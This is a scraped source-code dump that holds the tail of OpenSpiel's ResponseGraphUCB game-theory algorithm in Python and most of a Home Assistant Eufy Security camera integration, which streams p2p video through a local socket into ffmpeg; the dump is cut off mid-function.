edges_removed:\n for s in e:\n self.vertex_valences[s] -= 1\n self.sum_valences -= 1\n\n # Calculate probabilities\n probs = np.array([self.vertex_valences[v]**2 for v in self.V])\n probs = probs / np.sum(probs)\n s_ix = np.random.choice(np.arange(len(self.V)), p=probs)\n self.profile_queue.append(self.V[s_ix])\n\n def _initialise_queue_count_weighted(self):\n # Keep track of which vertices have non-zero valence in graph\n self.vertex_valences = {\n v: np.sum(self.G.strategy_spaces) - self.G.n_players for v in self.V\n }\n self.sum_valences = sum(self.vertex_valences.values())\n\n def _add_to_queue_count_weighted(self, edges_removed):\n \"\"\"Adds edge to sampling queue using count-weighted sampling.\"\"\"\n # Update vertex valences\n for e in edges_removed:\n for s in e:\n self.vertex_valences[s] -= 1\n self.sum_valences -= 1\n # Check counts\n eligible_vertices = {\n v: self.count[0][v] for v in self.V if self.vertex_valences[v] != 0\n }\n strat = min(eligible_vertices, key=eligible_vertices.get)\n self.profile_queue.append(strat)\n\n def initialise_queue(self):\n \"\"\"Initializes sampling queue.\"\"\"\n self.edges_remaining = copy.deepcopy(self.E)\n if self.exploration_strategy == 'uniform':\n self._initialise_queue_uniform()\n elif self.exploration_strategy == 'uniform-exhaustive':\n self._initialise_queue_uniform_exhaustive()\n elif self.exploration_strategy == 'valence-weighted':\n self._initialise_queue_valence_weighted()\n elif self.exploration_strategy == 'count-weighted':\n self._initialise_queue_count_weighted()\n else:\n raise ValueError('Did not recognise exploration strategy: {}'.format(\n self.exploration_strategy))\n\n self.profile_queue = []\n\n def add_to_queue(self, removed):\n \"\"\"Update the sampling queue and the list of resolved edges.\n\n Args:\n removed: the list of edges resolved in the previous round, which should be\n removed from the sampling list in subsequent rounds.\n \"\"\"\n if self.exploration_strategy == 'uniform':\n self._add_to_queue_uniform(removed)\n elif self.exploration_strategy == 'uniform-exhaustive':\n self._add_to_queue_uniform_exhaustive(removed)\n elif self.exploration_strategy == 'valence-weighted':\n self._add_to_queue_valence_weighted(removed)\n elif self.exploration_strategy == 'count-weighted':\n self._add_to_queue_count_weighted(removed)\n else:\n raise ValueError('Did not recognise exploration strategy: {}'.format(\n 
self.exploration_strategy))\n\n def evaluate_strategy_profile(self, yield_outcomes=False):\n \"\"\"Evaluates a strategy profile on the sampling queue.\n\n Specifically, this:\n 1. Removes a strategy profile from the queue.\n 2. Evaluates it.\n 3. Updates internal statistics.\n 4. Adjusts list of strategy profiles whose statistics have been updated\n since last confidence bound check.\n\n Args:\n yield_outcomes: set True to yield the outcomes as well.\n\n Yields:\n s: profile evaluated.\n game_outcome: outcomes (player payoffs) for profile s.\n \"\"\"\n if self.profile_queue:\n s = self.profile_queue.pop(0)\n if s not in self.active_strategy_profiles:\n self.active_strategy_profiles.append(s)\n game_outcome = self.G.observe_result(s)\n if yield_outcomes:\n yield s, game_outcome\n self.update_mean_and_count(s, game_outcome)\n\n def _ucb_standard_factor(self, s, k):\n return np.sqrt(np.log(2 / self.delta(k, s)) / (2 * self.count[k][s]))\n\n def _bernoulli_upper(self, p, n, delta):\n \"\"\"Returns upper confidence bound for proportion p successes of n trials.\n\n Uses exact Clopper-Pearson interval.\n\n Args:\n p: proportion of successes.\n n: number of trials.\n delta: confidence parameter.\n \"\"\"\n if p > 1 - 1e-6:\n return 1.\n else:\n upper = scipy.stats.beta.ppf(1. - delta / 2, p * n + 1, n - p * n)\n return upper\n\n def _bernoulli_lower(self, p, n, delta):\n \"\"\"Returns lower confidence bound for proportion p successes of n trials.\n\n Uses exact Clopper-Pearson interval.\n\n Args:\n p: proportion of successes.\n n: number of trials.\n delta: confidence parameter.\n \"\"\"\n if p < 1e-6:\n return 0.\n else:\n lower = scipy.stats.beta.ppf(delta / 2, p * n, n - p * n + 1)\n return lower\n\n def _ucb(self, s, k):\n \"\"\"Returns k-th player's payoff upper-confidence-bound given profile s.\"\"\"\n if self.confidence_method == 'ucb-standard':\n ucb_factor = self._ucb_standard_factor(s, k)\n return self.mu[k][s] + ucb_factor\n elif self.confidence_method == 'ucb-standard-relaxed':\n ucb_factor = self._ucb_standard_factor(s, k) - self.ucb_eps\n return self.mu[k][s] + ucb_factor\n elif self.confidence_method == 'clopper-pearson-ucb':\n return self._bernoulli_upper(self.mu[k][s], self.count[k][s],\n self.delta(k, s))\n elif self.confidence_method == 'clopper-pearson-ucb-relaxed':\n return self._bernoulli_upper(self.mu[k][s], self.count[k][s],\n self.delta(k, s)) - self.ucb_eps\n else:\n raise ValueError('Did not recognise confidence method {}'.format(\n self.confidence_method))\n\n def _lcb(self, s, k):\n \"\"\"Returns k-th player's payoff lower-confidence-bound given profile s.\"\"\"\n if self.confidence_method == 'ucb-standard':\n ucb_factor = self._ucb_standard_factor(s, k)\n return self.mu[k][s] - ucb_factor\n elif self.confidence_method == 'ucb-standard-relaxed':\n ucb_factor = self._ucb_standard_factor(s, k) + self.ucb_eps\n return self.mu[k][s] - ucb_factor\n elif self.confidence_method == 'clopper-pearson-ucb':\n return self._bernoulli_lower(self.mu[k][s], self.count[k][s],\n self.delta(k, s))\n elif self.confidence_method == 'clopper-pearson-ucb-relaxed':\n return self._bernoulli_lower(self.mu[k][s], self.count[k][s],\n self.delta(k, s)) + self.ucb_eps\n else:\n raise ValueError('Did not recognise confidence method {}'.format(\n self.confidence_method))\n\n def ucb_check(self, e):\n \"\"\"Conducts a UCB check on response graph edge e.\n\n Specifically, given edge e connecting two strategy profiles s1 and s2, this:\n 1. Determines the dominating strategy.\n 2. 
Checks whether the payoff_UCB(worse_strategy) is less than\n the payoff_LCB of the better strategy; if this is true, the confidence\n intervals are disjoint, and the edge e is considered 'resolved'.\n\n Args:\n e: response graph edge.\n\n Returns:\n A bool indicating whether the edge is resolved,\n and also a tuple specifying the worse and better strategies.\n \"\"\"\n\n s1, s2 = e\n k = self._find_focal_coord(s1, s2)\n if self.mu[k][s1] > self.mu[k][s2]:\n better_strat = s1\n worse_strat = s2\n else:\n better_strat = s2\n worse_strat = s1\n\n ucb = self._ucb(worse_strat, k)\n lcb = self._lcb(better_strat, k)\n\n return (ucb < lcb), (worse_strat, better_strat)\n\n def check_confidence(self):\n \"\"\"Returns the edges that are 'resolved' given a confidence bound check.\"\"\"\n edges_to_check = []\n\n for e in self.edges_remaining:\n for s in self.active_strategy_profiles:\n if s in e:\n if e not in edges_to_check:\n edges_to_check.append(e)\n\n edges_removed = []\n for e in edges_to_check:\n removed, ordered_edge = self.ucb_check(e)\n if removed:\n edges_removed.append(e)\n self.edges_remaining.remove(e)\n self.directed_edges.append(ordered_edge)\n\n self.active_strategy_profiles = []\n\n return edges_removed\n\n def real_edge_direction(self, e):\n s1, s2 = e\n k = self._find_focal_coord(s1, s2)\n if self.G.means[k][s1] > self.G.means[k][s2]:\n return (s2, s1)\n else:\n return (s1, s2)\n\n def construct_real_graph(self):\n directed_edges = []\n for e in self.E:\n ordered_edge = self.real_edge_direction(e)\n directed_edges.append(ordered_edge)\n\n return self._construct_digraph(directed_edges)\n\n def compute_graph(self):\n for e in self.E:\n s1, s2 = e[0], e[1]\n k = self._find_focal_coord(s1, s2)\n if self.mu[k][s1] > self.mu[k][s2]:\n directed_edge = (s2, s1)\n else:\n directed_edge = (s1, s2)\n if directed_edge not in self.directed_edges:\n self.directed_edges.append(directed_edge)\n\n def forced_exploration(self):\n for v in self.V:\n game_outcome = self.G.observe_result(v)\n self.update_mean_and_count(v, game_outcome)\n\n def run(self, verbose=True, max_total_iterations=50000):\n \"\"\"Runs the ResponseGraphUCB algorithm.\"\"\"\n self.verbose = verbose\n\n # Upper bounds on number of evaluations\n self.max_total_iterations = max_total_iterations\n\n self.initialise_mean_and_count()\n self.directed_edges = []\n self.active_strategy_profiles = []\n self.initialise_queue()\n\n # Forced initial exploration\n self.forced_exploration()\n\n # Keep evaluating nodes until check method declares that we're finished\n iterations = 0\n edges_resolved_this_round = []\n while self.total_interactions < max_total_iterations:\n # Add nodes to queue\n self.add_to_queue(removed=edges_resolved_this_round)\n\n # Evaluate the nodes and log results\n for v, _ in self.evaluate_strategy_profile():\n if verbose:\n print(v)\n\n # Recompute confidence bounds, eliminate, stop etc.\n edges_resolved_this_round = self.check_confidence()\n\n if not self.edges_remaining:\n break\n iterations += 1\n\n # Fill in missing edges if max iters reached without resolving all edges\n self.compute_graph()\n\n # Compute objects to be returned\n if verbose:\n total_steps = self.compute_total_steps()\n print('\\nTotal steps taken = {}'.format(total_steps))\n results = {}\n results['interactions'] = int(np.sum(self.count[0]))\n graph = self._construct_digraph(self.directed_edges)\n results['graph'] = graph\n return results\n\n def compute_total_steps(self):\n return int(np.sum(self.count[0]))\n\n def _construct_digraph(self, edges):\n 
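# Builds a NetworkX DiGraph with one node per strategy profile in self.V and
# one arc per resolved edge, oriented from the worse profile to the better one
# (the (worse, better) ordering produced by ucb_check above).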
graph = nx.DiGraph()\n graph.add_nodes_from(self.V)\n for e in edges:\n graph.add_edge(e[0], e[1])\n return graph\n\n def _plot_errorbars_2x2x2(self, x, y, xerr, yerr, fmt):\n \"\"\"Plots ResponseGraph with error bars for a 2-player 2x2 game.\"\"\"\n\n # plt.errorbar does not accept list of colors, so plot twice\n for i_strat in [0, 1]:\n if xerr[i_strat] is None:\n plt.errorbar(\n x=x[i_strat],\n y=y[i_strat],\n yerr=np.reshape(yerr[:, i_strat], (2, 1)),\n markerfacecolor='b',\n ecolor='b',\n fmt=fmt,\n zorder=0)\n elif yerr[i_strat] is None:\n plt.errorbar(\n x=x[i_strat],\n y=y[i_strat],\n xerr=np.reshape(xerr[:, i_strat], (2, 1)),\n markerfacecolor='b',\n ecolor='b',\n fmt=fmt,\n zorder=0)\n else:\n raise ValueError()\n\n def visualise_2x2x2(self, real_values, graph):\n \"\"\"Plots summary of ResponseGraphUCB for a 2-player 2x2 game.\"\"\"\n _, axes = plt.subplots(3, 3, figsize=(10, 10),\n gridspec_kw={'width_ratios': [1, 2, 1],\n 'height_ratios': [1, 2, 1]})\n axes[0, 0].axis('off')\n axes[0, 2].axis('off')\n axes[2, 0].axis('off')\n axes[2, 2].axis('off')\n\n # (0,0) vs. (0,1)\n plt.sca(axes[0, 1])\n s1 = (0, 0)\n s2 = (0, 1)\n self._plot_errorbars_2x2x2(\n x=[0, 1],\n y=[self.mu[1][s1], self.mu[1][s2]],\n xerr=[None, None],\n yerr=np.array([[self.mu[1][s1] - self._lcb(s1, 1),\n self.mu[1][s2] - self._lcb(s2, 1)],\n [self._ucb(s1, 1) - self.mu[1][s1],\n self._ucb(s2, 1) - self.mu[1][s2]]]),\n fmt='o')\n plt.scatter([0, 1], [real_values[1, 0, 0], real_values[1, 0, 1]],\n color='red',\n zorder=1)\n plt.tick_params(axis='both', which='major', labelsize=14)\n plt.tick_params(axis='both', which='minor', labelsize=14)\n plt.xticks([])\n plt.yticks([0, 0.5, 1])\n plt.gca().set_yticklabels(['0', '', '1'])\n plt.gca().yaxis.set_ticks_position('left')\n plt.gca().grid(True)\n plt.ylim(0, 1)\n\n # (0,0) vs. (1,0)\n plt.sca(axes[1, 0])\n s1 = (1, 0)\n s2 = (0, 0)\n self._plot_errorbars_2x2x2(\n x=[self.mu[0][s1], self.mu[0][s2]],\n y=[0, 1],\n xerr=np.array([[self.mu[0][s1] - self._lcb(s1, 0),\n self.mu[0][s2] - self._lcb(s2, 0)],\n [self._ucb(s1, 0) - self.mu[0][s1],\n self._ucb(s2, 0) - self.mu[0][s2]]]),\n yerr=[None, None],\n fmt='o')\n plt.scatter([real_values[0, 1, 0], real_values[0, 0, 0]], [0, 1],\n color='red',\n zorder=1)\n plt.tick_params(axis='both', which='major', labelsize=14)\n plt.tick_params(axis='both', which='minor', labelsize=14)\n plt.xticks([0, 0.5, 1])\n plt.gca().set_xticklabels(['0', '', '1'])\n plt.gca().xaxis.set_ticks_position('bottom')\n plt.gca().grid(True)\n plt.yticks([])\n plt.xlim(0, 1)\n\n # (0,1) vs. (1,1)\n plt.sca(axes[1, 2])\n s1 = (1, 1)\n s2 = (0, 1)\n self._plot_errorbars_2x2x2(\n x=[self.mu[0][s1], self.mu[0][s2]],\n y=[0, 1],\n xerr=np.array([[self.mu[0][s1] - self._lcb(s1, 0),\n self.mu[0][s2] - self._lcb(s2, 0)],\n [self._ucb(s1, 0) - self.mu[0][s1],\n self._ucb(s2, 0) - self.mu[0][s2]]]),\n yerr=[None, None],\n fmt='o')\n plt.scatter([real_values[0, 1, 1], real_values[0, 0, 1]], [0, 1],\n color='red',\n zorder=1)\n plt.tick_params(axis='both', which='major', labelsize=14)\n plt.tick_params(axis='both', which='minor', labelsize=14)\n plt.xticks([0, 0.5, 1])\n plt.gca().set_xticklabels(['0', '', '1'])\n plt.gca().xaxis.set_ticks_position('top')\n plt.yticks([])\n plt.gca().grid(True)\n plt.xlim(0, 1)\n\n # (1,0) vs. 
(1,1)\n plt.sca(axes[2, 1])\n s1 = (1, 0)\n s2 = (1, 1)\n self._plot_errorbars_2x2x2(\n x=[0, 1],\n y=[self.mu[1][s1], self.mu[1][s2]],\n xerr=[None, None],\n yerr=np.array([[self.mu[1][s1] - self._lcb(s1, 1),\n self.mu[1][s2] - self._lcb(s2, 1)],\n [self._ucb(s1, 1) - self.mu[1][s1],\n self._ucb(s2, 1) - self.mu[1][s2]]]),\n fmt='o')\n plt.scatter([0, 1], [real_values[1, 1, 0], real_values[1, 1, 1]],\n color='red',\n zorder=1)\n plt.tick_params(axis='both', which='major', labelsize=14)\n plt.tick_params(axis='both', which='minor', labelsize=14)\n plt.xticks([])\n plt.yticks([0, 0.5, 1])\n plt.gca().set_yticklabels(['0', '', '1'])\n plt.gca().yaxis.set_ticks_position('right')\n plt.gca().grid(True)\n plt.ylim(0, 1)\n self.plot_graph(graph, subplot=True, axes=axes) # Chart in the middle\n\n def plot_graph(self, graph, subplot=False, axes=None):\n \"\"\"Plots the response graph.\"\"\"\n if subplot:\n plt.sca(axes[1, 1])\n axes[1, 1].axis('off')\n else:\n plt.figure(figsize=(5, 5))\n if len(graph.nodes) == 4:\n pos = {(0, 0): [0, 1], (0, 1): [1, 1], (1, 0): [0, 0], (1, 1): [1, 0]}\n else:\n pos = nx.circular_layout(graph)\n nx.draw_networkx_nodes(\n graph, pos, node_size=1800, node_color='w', edgecolors='k')\n nx.draw_networkx_edges(\n graph,\n pos,\n node_size=1800,\n edge_color='k',\n arrowstyle='->',\n arrowsize=10,\n width=3)\n nx.draw_networkx_labels(self.G, pos, {x: x for x in self.V}, font_size=14)\n\n def visualise_count_history(self, figsize=(5, 2)):\n \"\"\"Plots the sampling count history for each strategy profile.\"\"\"\n plt.figure(figsize=figsize)\n data = []\n labels = []\n for v in self.V:\n print(v)\n labels.append(v)\n data.append(self.count_history[v])\n pal = plt.get_cmap('Dark2').colors\n plt.stackplot(\n np.arange(1, self.total_interactions + 1),\n np.array(data),\n labels=labels,\n colors=pal)\n plt.ylim(top=1, bottom=0)\n plt.xlabel('Interactions')\n plt.ylabel('Proportions')\n\n # Shrink current axis\n ax = plt.gca()\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.67, box.height])\n plt.xlim(1, self.total_interactions)\n plt.legend(loc='center left', bbox_to_anchor=(1, 0.5), ncol=1)\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/algorithms/response_graph_ucb.py","file_name":"response_graph_ucb.py","file_ext":"py","file_size_in_byte":21882,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"} +{"seq_id":"24275451277","text":"from aiohttp import web\nimport aiohttp\nimport asyncio\nimport logging\nfrom contextlib import suppress\nimport threading\nfrom time import sleep\nimport socket\nimport traceback\n\nfrom haffmpeg.camera import CameraMjpeg\nfrom haffmpeg.tools import ImageFrame\nimport voluptuous as vol\nimport async_timeout\n\nfrom homeassistant.components.camera import (\n SUPPORT_ON_OFF,\n SUPPORT_STREAM,\n Camera,\n CameraEntityFeature,\n)\nfrom homeassistant.components.camera.const import STREAM_TYPE_HLS\nfrom homeassistant.components.ffmpeg import DATA_FFMPEG\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.exceptions import HomeAssistantError\nfrom homeassistant.helpers import entity_platform\nfrom homeassistant.helpers.aiohttp_client import (\n async_aiohttp_proxy_stream,\n async_get_clientsession,\n)\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.config_validation import 
make_entity_service_schema\nfrom homeassistant.helpers.event import async_call_later\n\nfrom .const import COORDINATOR, DEFAULT_CODEC, DOMAIN, NAME, Device, wait_for_value\nfrom .coordinator import EufySecurityDataUpdateCoordinator\nfrom .entity import EufySecurityEntity\n\nSTATE_IDLE = \"Idle\"\nSTATE_STREAMING = \"Streaming\"\nSTATE_MOTION_DETECTED = \"Motion Detected\"\nSTATE_PERSON_DETECTED = \"Person Detected\"\n\nSTREAMING_SOURCE_RTSP = \"rtsp\"\nSTREAMING_SOURCE_P2P = \"p2p\"\n\nFFMPEG_COMMAND = [\n # \"-re\",\n \"-y\",\n \"-analyzeduration\",\n \"{analyze_duration}\",\n \"-protocol_whitelist\",\n \"pipe,file,tcp\",\n \"-f\",\n \"{video_codec}\",\n \"-i\",\n # \"-\",\n \"tcp://localhost:{port}\",\n \"-vcodec\",\n \"copy\",\n \"-protocol_whitelist\",\n \"pipe,file,tcp,udp,rtsp,rtp\",\n]\nFFMPEG_OPTIONS = (\n \" -hls_init_time 0\"\n \" -hls_time 1\"\n \" -hls_segment_type mpegts\"\n \" -hls_playlist_type event \"\n \" -hls_list_size 0\"\n \" -preset ultrafast\"\n \" -tune zerolatency\"\n \" -g 15\"\n \" -sc_threshold 0\"\n \" -fflags genpts+nobuffer+flush_packets\"\n \" -loglevel debug\"\n)\n\n_LOGGER: logging.Logger = logging.getLogger(__package__)\n\nALARM_TRIGGER_SCHEMA = make_entity_service_schema({vol.Required(\"duration\"): cv.Number})\n\nQUICK_RESPONSE_SCHEMA = make_entity_service_schema(\n {vol.Required(\"voice_id\"): cv.Number}\n)\n\n\nasync def async_setup_entry(\n hass: HomeAssistant, config_entry: ConfigEntry, async_add_devices\n):\n coordinator: EufySecurityDataUpdateCoordinator = hass.data[DOMAIN][COORDINATOR]\n\n entities = []\n for device in coordinator.devices.values():\n if device.is_camera() is True:\n camera: EufySecurityCamera = EufySecurityCamera(\n coordinator, config_entry, device\n )\n entities.append(camera)\n\n _LOGGER.debug(f\"{DOMAIN} - camera setup entries - {entities}\")\n async_add_devices(entities, True)\n\n # register entity level services\n platform = entity_platform.async_get_current_platform()\n platform.async_register_entity_service(\n \"start_livestream\", {}, \"async_start_p2p_livestream\"\n )\n platform.async_register_entity_service(\n \"stop_livestream\", {}, \"async_stop_p2p_livestream\"\n )\n platform.async_register_entity_service(\n \"start_p2p_livestream\", {}, \"async_start_p2p_livestream\"\n )\n platform.async_register_entity_service(\n \"stop_p2p_livestream\", {}, \"async_stop_p2p_livestream\"\n )\n platform.async_register_entity_service(\n \"start_rtsp_livestream\", {}, \"async_start_rtsp_livestream\"\n )\n platform.async_register_entity_service(\n \"stop_rtsp_livestream\", {}, \"async_stop_rtsp_livestream\"\n )\n platform.async_register_entity_service(\"enable_rtsp\", {}, \"async_enable_rtsp\")\n platform.async_register_entity_service(\"disable_rtsp\", {}, \"async_disable_rtsp\")\n platform.async_register_entity_service(\"enable\", {}, \"async_enable\")\n platform.async_register_entity_service(\"disable\", {}, \"async_disable\")\n platform.async_register_entity_service(\n \"alarm_trigger_for_camera_with_duration\",\n ALARM_TRIGGER_SCHEMA,\n \"async_alarm_trigger_with_duration\",\n )\n platform.async_register_entity_service(\n \"reset_alarm_for_camera\", {}, \"async_reset_alarm\"\n )\n platform.async_register_entity_service(\n \"quick_response\", QUICK_RESPONSE_SCHEMA, \"async_quick_response\"\n )\n\n\nclass EufySecurityCamera(Camera, EufySecurityEntity):\n def __init__(\n self,\n coordinator: EufySecurityDataUpdateCoordinator,\n config_entry: ConfigEntry,\n device: Device,\n ) -> None:\n Camera.__init__(self)\n 
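# Both base classes are initialized explicitly (rather than via super()),
# since this entity multiply inherits from Camera and EufySecurityEntity.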
EufySecurityEntity.__init__(self, coordinator, config_entry, device)\n\n self.device.set_streaming_status_callback(self.set_is_streaming)\n self._attr_frontend_stream_type = STREAM_TYPE_HLS\n self._attr_supported_features = CameraEntityFeature.STREAM\n self._attr_name = self.device.name\n self._attr_id = f\"{DOMAIN}_{self.device.serial_number}_camera\"\n self._attr_unique_id = self._attr_id\n self._attr_brand = NAME\n self._attr_model = self.device.model\n\n # camera image\n self.picture_bytes = None\n self.picture_url = None\n self.no_picture_counter = 0\n\n # p2p streaming\n self.start_stream_function = self.async_start_p2p_livestream\n self.stop_stream_function = self.async_stop_p2p_livestream\n\n # video generation using ffmpeg for p2p\n self.ffmpeg_binary = self.coordinator.hass.data[DATA_FFMPEG].binary\n self.ffmpeg_content_type = self.coordinator.hass.data[\n DATA_FFMPEG\n ].ffmpeg_stream_content_type\n self.ffmpeg = CameraMjpeg(self.ffmpeg_binary)\n self.default_codec = DEFAULT_CODEC\n self.is_ffmpeg_running = False\n\n # when HA started, p2p streaming was active, catch up with p2p streaming\n if self.device.is_p2p_streaming is True:\n async_call_later(self.coordinator.hass, 0, self.async_start_p2p_livestream)\n\n self.p2p_url = f\"rtsp://{self.coordinator.config.rtsp_server_address}:{self.coordinator.config.rtsp_server_port}/{self.device.serial_number}\"\n self.p2p_port = 0\n self.p2p_thread = threading.Thread(\n target=self.handle_queue_threaded, daemon=True\n )\n self.p2p_thread.start()\n self.ffmpeg_output = f\"-f rtsp -rtsp_transport tcp {self.p2p_url}\"\n\n # for rtsp streaming\n if self.device.state.get(\"rtspStream\", None) is not None:\n self.start_stream_function = self.async_start_rtsp_livestream\n self.stop_stream_function = self.async_stop_rtsp_livestream\n\n self.set_is_streaming()\n\n def handle_queue_threaded(self):\n codec_checked = False\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n try:\n _LOGGER.debug(\"start socket for tcp\")\n sock.bind((\"localhost\", 0))\n self.p2p_port = sock.getsockname()[1]\n except Exception as err:\n _LOGGER.error(\"Unable to connect to host: %s\", err)\n return\n\n while True:\n sock.listen()\n client_socket, client_address = sock.accept()\n _LOGGER.debug(\"client connected\")\n\n with client_socket:\n while self.device.is_streaming is True:\n while not self.device.queue.empty():\n if (\n codec_checked is False\n and self.device.codec != self.default_codec\n ):\n self.default_codec = self.device.codec\n self.stop_ffmpeg()\n async_call_later(\n self.coordinator.hass, 0, self.start_ffmpeg\n )\n codec_checked = True\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - handle_queue_threaded - fix codec\"\n )\n sleep(2)\n break\n\n try:\n client_socket.sendall(\n bytearray(self.device.queue.get()[\"data\"])\n )\n except OSError as err:\n _LOGGER.error(\"Unable to send payload : %s\", err)\n\n sleep(0.1)\n client_socket.close()\n sock.close()\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - handle_queue_threaded - finish - {self.device.queue.qsize()} - {self.ffmpeg.is_running} - {self.device.is_streaming}\"\n )\n\n async def start_ffmpeg(self, executed_at=None):\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - start_ffmpeg 1 - codec {self.default_codec}\"\n )\n ffmpeg_command_instance = FFMPEG_COMMAND.copy()\n input_index = ffmpeg_command_instance.index(\"-i\")\n ffmpeg_command_instance[input_index - 1] = self.default_codec\n ffmpeg_command_instance[input_index - 5] = str(\n int(self.coordinator.config.ffmpeg_analyze_duration) * 
1000000\n )\n ffmpeg_command_instance[input_index + 1] = ffmpeg_command_instance[\n input_index + 1\n ].replace(\"{port}\", str(self.p2p_port))\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - start_ffmpeg 2 - ffmpeg_command_instance {ffmpeg_command_instance}\"\n )\n\n ffmpeg_options_instance = FFMPEG_OPTIONS\n if self.coordinator.config.generate_ffmpeg_logs == True:\n ffmpeg_options_instance = ffmpeg_options_instance + \" -report\"\n\n result = await self.ffmpeg.open(\n cmd=ffmpeg_command_instance,\n input_source=None,\n extra_cmd=ffmpeg_options_instance,\n output=self.ffmpeg_output,\n stderr_pipe=False,\n stdout_pipe=False,\n )\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - start_ffmpeg 3 - ffmpeg_command_instance {ffmpeg_command_instance}\"\n )\n self.is_ffmpeg_running = True\n return result\n\n def stop_ffmpeg(self):\n try:\n self.ffmpeg.kill()\n except Exception as ex:\n _LOGGER.error(\n f\"{DOMAIN} {self.name} - stop_ffmpeg exception: {ex} - traceback: {traceback.format_exc()}\"\n )\n self.is_ffmpeg_running = False\n _LOGGER.debug(f\"{DOMAIN} {self.name} - stop_ffmpeg - done\")\n\n def start_p2p(self):\n _LOGGER.debug(f\"{DOMAIN} {self.name} - start_p2p - 1\")\n self.device.queue.queue.clear()\n self.empty_queue_counter = 0\n if self.ffmpeg.is_running is True:\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - start_p2p - ffmeg - running - stop it\"\n )\n self.stop_ffmpeg()\n _LOGGER.debug(f\"{DOMAIN} {self.name} - start_p2p - 2\")\n _LOGGER.debug(f\"{DOMAIN} {self.name} - start_p2p - 3\")\n async_call_later(self.coordinator.hass, 1, self.start_ffmpeg)\n\n def stop_p2p(self):\n self.device.queue.queue.clear()\n if self.stream is not None:\n self.stream.stop()\n self.stream = None\n if self.ffmpeg.is_running is True:\n self.stop_ffmpeg()\n self.empty_queue_counter = 0\n\n @property\n def state(self) -> str:\n if self.device.is_streaming is True:\n return f\"{STATE_STREAMING}\"\n elif self.device.state.get(\"motionDetected\", False):\n return STATE_MOTION_DETECTED\n elif self.device.state.get(\"personDetected\", False):\n return STATE_PERSON_DETECTED\n else:\n if not self.device.state.get(\"battery\", None) is None:\n return f\"{STATE_IDLE} - {self.device.state['battery']} %\"\n return STATE_IDLE\n\n def set_is_streaming(self):\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - set_is_streaming - start - {self.device.is_rtsp_streaming} - {self.device.is_p2p_streaming} - {self.device.is_streaming}\"\n )\n # based on streaming options, set streaming variables\n if (\n self.device.is_rtsp_streaming is True\n or self.device.is_p2p_streaming is True\n ) and self.device.is_streaming is False:\n _LOGGER.debug(f\"{DOMAIN} {self.name} - set_is_streaming - some streaming\")\n if self.device.is_rtsp_streaming is True:\n self.device.stream_source_type = STREAMING_SOURCE_RTSP\n self.device.stream_source_address = self.device.state[\"rtspStreamUrl\"]\n self.device.is_streaming = True\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - set_is_streaming - is_rtsp_streaming\"\n )\n if self.device.is_p2p_streaming is True:\n self.start_p2p()\n self.device.stream_source_type = STREAMING_SOURCE_P2P\n self.device.stream_source_address = self.p2p_url\n self.device.is_streaming = True\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - set_is_streaming - is_p2p_streaming\"\n )\n if (\n self.device.is_rtsp_streaming is False\n and self.device.is_p2p_streaming is False\n ) and self.device.is_streaming is True:\n if self.device.stream_source_type is STREAMING_SOURCE_P2P:\n self.stop_p2p()\n self.device.stream_source_type = None\n 
self.device.stream_source_address = None\n self.device.is_streaming = False\n _LOGGER.debug(f\"{DOMAIN} {self.name} - set_is_streaming - no_streaming\")\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - set_is_streaming - end - {self.device.is_rtsp_streaming} - {self.device.is_p2p_streaming} - {self.device.is_streaming}\"\n )\n self._attr_is_streaming = self.device.is_streaming\n\n async def initiate_turn_on(self):\n await self.coordinator.hass.async_add_executor_job(self.turn_on)\n await wait_for_value(self.device.__dict__, \"is_streaming\", False, interval=0.5)\n\n async def stream_source(self):\n if self.device.is_streaming is False:\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - stream_source - start - {self.device.is_streaming}\"\n )\n if self.coordinator.config.auto_start_stream is False:\n return None\n await self.initiate_turn_on()\n _LOGGER.debug(f\"{DOMAIN} {self.name} - stream_source - initiate finished\")\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - stream_source - address - {self.device.stream_source_address}\"\n )\n if self.device.is_streaming is False:\n return None\n return self.device.stream_source_address\n\n def camera_image(self, width=None, height=None) -> bytes:\n return asyncio.run_coroutine_threadsafe(\n self.async_camera_image(width, height), self.coordinator.hass.loop\n ).result()\n\n async def async_camera_image(self, width=None, height=None) -> bytes:\n # if streaming is active, do not overwrite live image\n if self.device.is_streaming is True:\n size_command = None\n if width and height:\n size_command = f\"-s {width}x{height}\"\n image_frame_bytes = await ImageFrame(self.ffmpeg_binary).get_image(\n self.device.stream_source_address, extra_cmd=size_command\n )\n if (image_frame_bytes is not None) and len(image_frame_bytes) > 0:\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - camera_image len - {len(image_frame_bytes)}\"\n )\n self.picture_bytes = image_frame_bytes\n self.picture_url = None\n self.no_picture_counter = 0\n else:\n if self.no_picture_counter > 0:\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - camera_image - no image - stop\"\n )\n if self.device.is_p2p_streaming is True:\n await self.async_stop_p2p_livestream()\n if self.device.is_rtsp_streaming is True:\n await self.async_stop_rtsp_livestream()\n self.no_picture_counter = self.no_picture_counter + 1\n else:\n current_picture_url = self.device.state.get(\"pictureUrl\", \"\")\n self.no_picture_counter = 0\n if self.picture_url != current_picture_url:\n async with async_get_clientsession(self.coordinator.hass).get(\n current_picture_url\n ) as response:\n if response.status == 200:\n self.picture_bytes = await response.read()\n self.picture_url = current_picture_url\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - camera_image -{current_picture_url} - {len(self.picture_bytes)}\"\n )\n return self.picture_bytes\n\n async def handle_async_mjpeg_stream(self, request):\n stream = 